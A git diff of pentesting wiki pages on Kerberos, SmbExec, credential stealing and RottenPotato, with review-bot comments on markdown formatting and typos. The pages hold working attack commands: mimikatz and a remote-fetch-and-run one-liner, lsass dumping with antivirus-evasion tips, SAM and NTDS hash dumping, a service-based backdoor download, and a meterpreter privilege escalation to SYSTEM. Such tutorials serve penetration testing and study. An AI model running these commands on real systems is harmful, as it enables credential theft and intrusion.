+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} **This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/) -# Kerberos (I): How does Kerberos work? – Theory +## Kerberos (I): How does Kerberos work? – Theory 20 - MAR - 2019 - ELOY PÉREZ @@ -31,13 +37,13 @@ In this first post only basic functionality will be discussed. In later posts it If you have any doubt about the topic which it is not well explained, do not be afraid on leave a comment or question about it. Now, onto the topic. -## What is Kerberos? +### What is Kerberos? Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access. Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources. -## Kerberos items +### Kerberos items In this section several components of Kerberos environment will be studied. @@ -98,7 +104,7 @@ Below is shown a summary of message sequency to perform authentication ![Kerberos messages summary](<../../.gitbook/assets/image (174).png>) -## Authentication process +### Authentication process In this section, the sequency of messages to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service. 
@@ -115,7 +121,7 @@ _KRB\_AS\_REQ_ has, among others, the following fields: * The service **SPN** asociated with **krbtgt** account * A **Nonce** generated by the user -Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) __ flag is set in user account. +Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) \_\_ flag is set in user account. **KRB\_AS\_REP** @@ -187,7 +193,7 @@ _KRB\_AP\_REQ_ includes: After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a _KRB\_AP\_REP_ message. -## References +### References * Kerberos v5 RFC: [https://tools.ietf.org/html/rfc4120](https://tools.ietf.org/html/rfc4120) * \[MS-KILE] – Kerberos extension: [https://msdn.microsoft.com/en-us/library/cc233855.aspx](https://msdn.microsoft.com/en-us/library/cc233855.aspx) 
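Review bot: In the `Note:` line of the hunk at -115,7, the trailing `__` after the DONT\_REQ\_PREAUTH link is replaced by `\_\_`, which escapes the markers and renders two literal underscores before "flag is set". Remove the stray markers instead of escaping them.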
@@ -195,7 +201,7 @@ After that, if user privileges are rigth, this can access to service. If is the * Mimikatz and Active Directory Kerberos Attacks: [https://adsecurity.org/?p=556](https://adsecurity.org/?p=556) * Explain like I’m 5: Kerberos: [https://www.roguelynn.com/words/explain-like-im-5-kerberos/](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) * Kerberos & KRBTGT: [https://adsecurity.org/?p=483](https://adsecurity.org/?p=483) -* Mastering Windows Network Forensics and Investigation, 2 Edition . Autores: S. Anson , S. Bunting, R. Johnson y S. Pearson. Editorial Sibex. +* Mastering Windows Network Forensics and Investigation, 2 Edition . Autores: S. Anson , S. Bunting, R. Johnson y S. Pearson. Editorial Sibex. * Active Directory , 5 Edition. Autores: B. Desmond, J. Richards, R. Allen y A.G. Lowe-Norris * Service Principal Names: [https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/ms677949\(v=vs.85\).aspx) * Niveles funcionales de Active Directory: [https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0](https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0) 
@@ -213,6 +219,12 @@ After that, if user privileges are rigth, this can access to service. If is the * Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: [https://www.microsoft.com/en-us/download/details.aspx?id=36036](https://www.microsoft.com/en-us/download/details.aspx?id=36036) * Fun with LDAP, Kerberos (and MSRPC) in AD Environments: [https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -229,5 +241,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/ntlm/smbexec.md b/windows-hardening/ntlm/smbexec.md index e32c2102..8fd1cda7 100644 --- a/windows-hardening/ntlm/smbexec.md +++ b/windows-hardening/ntlm/smbexec.md @@ -1,4 +1,4 @@ - +# SmbExec/ScExec
@@ -16,12 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# How does it works +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} -**Smbexec works like Psexec.** In this example**,** **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor. +## How does it works -# **SMBExec** +**Smbexec works like Psexec.** In this example\*\*,\*\* **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor. + +## **SMBExec** Let's see what happens when smbexec runs by looking at it from the attackers and target's side: @@ -33,7 +39,7 @@ So we know it creates a service "BTOBTO". But that service isn't present on the The Service File Name contains a command string to execute (%COMSPEC% points to the absolute path of cmd.exe). It echoes the command to be executed to a bat file, redirects the stdout and stderr to a Temp file, then executes the bat file and deletes it. Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our "pseudo-shell". For every command we type into our "shell", a new service is created and the process is repeated. This is why it doesn't need to drop a binary, it just executes each desired command as a new service. Definitely more stealthy, but as we saw, an event log is created for every command executed. Still a very clever way to get a non-interactive "shell"! -# Manual SMBExec +## Manual SMBExec **Or executing commands via services** 
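Review bot: In the first paragraph under `## How does it works`, `**,**` becomes `\*\*,\*\*`, so the page will show literal asterisks around the comma. Replace it with a plain comma. The heading itself could read "How does it work" while it is being re-levelled.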
@@ -55,10 +61,14 @@ And then start it: It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed. - - All the info was extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -75,5 +85,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/stealing-credentials/README.md b/windows-hardening/stealing-credentials/README.md index 005323da..c2a6406c 100644 --- a/windows-hardening/stealing-credentials/README.md +++ b/windows-hardening/stealing-credentials/README.md @@ -1,4 +1,4 @@ - +# Stealing Credentials
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Credentials Mimikatz +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +## Credentials Mimikatz ```bash #Elevate Privileges to extract the credentials @@ -33,7 +39,7 @@ mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump **Find other things that Mimikatz can do in** [**this page**](credentials-mimikatz.md)**.** -## Invoke-Mimikatz +### Invoke-Mimikatz ```bash IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1') @@ -43,7 +49,7 @@ Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpa [**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.** -# Credentials with Meterpreter +## Credentials with Meterpreter Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **that** I have created to **search for passwords and hashes** inside the victim. 
@@ -63,11 +69,11 @@ mimikatz_command -f "sekurlsa::logonpasswords" mimikatz_command -f "lsadump::sam" ``` -# Bypassing AV +## Bypassing AV -## Procdump + Mimikatz +### Procdump + Mimikatz -As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender. \ +As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender.\ You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally** from the dump. {% code title="Dump lsass" %} @@ -93,7 +99,7 @@ This process is done automatically with [SprayKatz](https://github.com/aas-n/spr **Note**: Some **AV** may **detect** as **malicious** the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting** the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier** to **pass** as an **argument** the **PID** of lsass.exe to procdump **instead o**f the **name lsass.exe.** -## Dumping lsass with **comsvcs.dll** +### Dumping lsass with **comsvcs.dll** There’s a DLL called **comsvcs.dll**, located in `C:\Windows\System32` that **dumps process memory** whenever they **crash**. This DLL contains a **function** called **`MiniDumpW`** that is written so it can be called with `rundll32.exe`.\ The first two arguments are not used, but the third one is split into 3 parts. First part is the process ID that will be dumped, second part is the dump file location, and third part is the word **full**. There is no other choice.\ 
@@ -108,44 +114,44 @@ We just have to keep in mind that this technique can only be executed as **SYSTE **You can automate this process with** [**lssasy**](https://github.com/Hackndo/lsassy)**.** -# CrackMapExec +## CrackMapExec -## Dump SAM hashes +### Dump SAM hashes ``` cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam ``` -## Dump LSA secrets +### Dump LSA secrets ``` cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa ``` -## Dump the NTDS.dit from target DC +### Dump the NTDS.dit from target DC ``` cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds #~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss ``` -## Dump the NTDS.dit password history from target DC +### Dump the NTDS.dit password history from target DC ``` #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history ``` -## Show the pwdLastSet attribute for each NTDS.dit account +### Show the pwdLastSet attribute for each NTDS.dit account ``` #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet ``` -# Stealing SAM & SYSTEM +## Stealing SAM & SYSTEM This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected. -## From Registry +### From Registry The easiest way to steal those files is to get a copy from the registry: @@ -162,11 +168,11 @@ samdump2 SYSTEM SAM impacket-secretsdump -sam sam -security security -system system LOCAL ``` -## Volume Shadow Copy +### Volume Shadow Copy You can perform copy of protected files using this service. You need to be Administrator. -### Using vssadmin +#### Using vssadmin vssadmin binary is only available in Windows Server versions 
@@ -196,7 +202,7 @@ $voume.Delete();if($notrunning -eq 1){$service.Stop()} Code from the book: [https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html) -## Invoke-NinjaCopy +### Invoke-NinjaCopy Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) to make a copy of SAM, SYSTEM and ntds.dit. @@ -204,12 +210,12 @@ Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github. Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam" ``` -# **Active Directory Credentials - NTDS.dit** +## **Active Directory Credentials - NTDS.dit** **The Ntds.dit file is a database that stores Active Directory data**, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. The important NTDS.dit file will be **located in**: _%SystemRoom%/NTDS/ntds.dit_\ -__This file is a database _Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables: +\_\_This file is a database _Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables: * **Data Table**: Contains the information about the objects (users, groups...) * **Link Table**: Information about the relations (member of...) 
@@ -217,9 +223,9 @@ __This file is a database _Extensible Storage Engine_ (ESE) and is "officially" More information about this: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/) -Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the **_**lsass**_** memory** (you can find the lastet accessed data probably because of the performance impruve by using a **cache**). +Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the \_lsass**\_\*\* memory\*\* (you can find the lastet accessed data probably because of the performance impruve by using a **cache**). -### Decrypting the hashes inside NTDS.dit +#### Decrypting the hashes inside NTDS.dit The hash is cyphered 3 times: @@ -229,7 +235,7 @@ The hash is cyphered 3 times: **PEK** have the **same value** in **every domain controller**, but it is **cyphered** inside the **NTDS.dit** file using the **BOOTKEY** of the **SYSTEM file of the domain controller (is different between domain controllers)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM** (_C:\Windows\System32\config\SYSTEM_). -## Copying NTDS.dit using Ntdsutil +### Copying NTDS.dit using Ntdsutil Available since Windows Server 2008. 
@@ -239,7 +245,7 @@ ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick). -## **Extracting hashes from NTDS.dit** +### **Extracting hashes from NTDS.dit** Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**: @@ -257,7 +263,7 @@ For **big NTDS.dit files** it's recommend to extract it using [gosecretsdump](ht Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject` -# Lazagne +## Lazagne Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases). you can use this binary to extract credentials from several software. @@ -265,13 +271,13 @@ Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases) lazagne.exe all ``` -# Other tools for extracting credentials from SAM and LSASS +## Other tools for extracting credentials from SAM and LSASS -## Windows credentials Editor (WCE) +### Windows credentials Editor (WCE) This tool can be used to extract credentials from the memory. Download it from: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/) -## fgdump +### fgdump Extract credentials from the SAM file @@ -280,7 +286,7 @@ You can find this binary inside Kali, just do: locate fgdump.exe fgdump.exe ``` -## PwDump +### PwDump Extract credentials from the SAM file 
@@ -290,14 +296,20 @@ PwDump.exe -o outpwdump -x 127.0.0.1 type outpwdump ``` -## PwDump7 +### PwDump7 Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco.org/security/pwdump\_7) and just **execute it** and the passwords will be extracted. -# Defenses +## Defenses [**Learn about some credentials protections here.**](credentials-protections.md) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -314,5 +326,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/windows-local-privilege-escalation/rottenpotato.md b/windows-hardening/windows-local-privilege-escalation/rottenpotato.md index c3038b04..ef5a47ee 100644 --- a/windows-hardening/windows-local-privilege-escalation/rottenpotato.md +++ b/windows-hardening/windows-local-privilege-escalation/rottenpotato.md @@ -1,4 +1,4 @@ - +# RottenPotato
@@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} The info in this page info was extracted [from this post](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/) -Service accounts usually have special privileges \(SeImpersonatePrivileges\) and this could be used to escalate privileges. +Service accounts usually have special privileges (SeImpersonatePrivileges) and this could be used to escalate privileges. [https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) @@ -27,7 +33,7 @@ I won’t go into the details on how this exploit works, the article above expla Let’s check our privileges with meterpreter: -```text +``` meterpreter > getprivs Enabled Process Privileges @@ -47,7 +53,7 @@ Excellent, it looks like we have the privileges we need to perform the attack. L Back on our meterpreter session we load the `incognito` extension. -```text +``` meterpreter > use incognito Loading extension incognito...Success. meterpreter > list_tokens -u @@ -67,7 +73,7 @@ No tokens available We can see we currently have no Impersonation Tokens. Let’s run the Rotten Potato exploit. -```text +``` meterpreter > execute -f rottenpotato.exe -Hc Process 3104 created. Channel 2 created. @@ -88,7 +94,7 @@ NT AUTHORITY\SYSTEM We need to quickly impersonate the token or it will disappear. -```text +``` meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" [-] Warning: Not currently running as SYSTEM, not all tokens will beavailable Call rev2self if primary process token is SYSTEM 
@@ -100,7 +106,12 @@ Server username: NT AUTHORITY\SYSTEM Success! We have our SYSTEM shell and can grab the root.txt file! +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -117,5 +128,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- -
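Review bot: In windows-hardening/ntlm/smbexec.md (hunk @@ -16,12 +16,18), the rewritten paragraph now reads `In this example\*\*,\*\* **instead** of pointing`, so the escaped markers render as literal asterisks around the comma where the old line had `**,**`. Drop the emphasis around the comma entirely. Since both lines are being rewritten anyway, also change the heading to "How does it work" and "one of they will" to "one of them will".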
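Review bot: The sponsor block added at the top and bottom of smbexec.md, stealing-credentials/README.md and rottenpotato.md is wrapped in `{% hint style="danger" %}`, the style readers take for a security warning. In stealing-credentials/README.md (hunk @@ -290,14 +296,20) it sits directly under the "Defenses" heading, after the single credentials-protections.md link, so it reads as part of the defensive guidance. Use a neutral hint style such as `info` for promotional text and keep it apart from the Defenses section. The first added line of each block is a lone `\`, which looks like export residue and can be dropped.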
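Review bot: In stealing-credentials/README.md (hunk @@ -204,12 +210,12), the added line `\_\_This file is a database _Extensible Storage Engine_ (ESE)` turns the stray `__` into escaped underscores, so the page will now show two literal underscores before "This file". Remove them instead of escaping them. The context line just above gives the location as `%SystemRoom%/NTDS/ntds.dit`; the variable is `%SystemRoot%`, and it is worth fixing in the same change.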
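Review bot: In stealing-credentials/README.md (hunk @@ -217,9 +223,9), the replacement `**inside the \_lsass**\_\*\* memory\*\*` breaks the emphasis that the old line closed correctly, so the rendered text will contain literal underscores and asterisks. Write it as `**inside the lsass memory**`, or keep the original nesting unescaped. The same added line carries over "its used by", "lastet" and "impruve"; correct them to "it's used by", "latest" and "improvement" while the line is being touched.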
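Review bot: In windows-local-privilege-escalation/rottenpotato.md (hunk @@ -16,10 +16,16), the line that removes the backslash escapes still names the privilege as "SeImpersonatePrivileges"; the Windows privilege is SeImpersonatePrivilege, singular, and that is the string a reader will see in `getprivs` output. The context line above it reads "The info in this page info was extracted", with "info" duplicated. The four later hunks in this file change the fence tag from `text` to a bare fence around meterpreter session output; keeping `text` is harmless and stops a renderer from guessing a highlighter for console output, so consider reverting that part.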